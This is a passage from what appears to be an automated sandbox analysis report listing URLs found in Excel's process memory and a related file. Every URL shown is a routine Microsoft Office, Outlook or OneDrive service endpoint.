    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comWW
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comYW
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comaW
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comgi
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comkWk;L
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comqh
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comuW
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksE:
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://officesetup.getmicrosoftkey.comQ%g;D
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/O
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesF
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://onedrive.live.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.comedu
    Source: EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://osi.office.net
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netf
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netm
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netst
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netz
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://otelrules.azureedge.net
    Source: EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://outlook.office.com
    Source: EXCEL.EXE, 00000000.00000002.607398237.000000000F300000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://outlook.office.com/
    Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comiUrl;
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://outlook.office365.com
    Source: EXCEL.EXE, 00000000.00000002.607398237.000000000F300000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://outlook.office365.com/
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/0
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: EXCEL.EXE, 00000000.00000002.608505078.0000000012D5D000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/ActivitiesMBI_SSL
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/3
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/review/query%
    Source: EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmpString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptionslL
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json98
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13db8
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://powerlift-frontdesk.acompli.net9
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://powerlift.acompli.netm
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptioneventsx
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://roaming.edog.
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://settings.outlook.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://settings.outlook.coml
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workA
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://staging.cortana.ai
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.ai)
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.aiP
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com(
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWriten
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/initl
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comD
    Source: EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comP
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.coms
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFilev;C9
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://tasks.office.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://tasks.office.comts
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html4
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devicesb
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://web.microsoftstream.com/video/
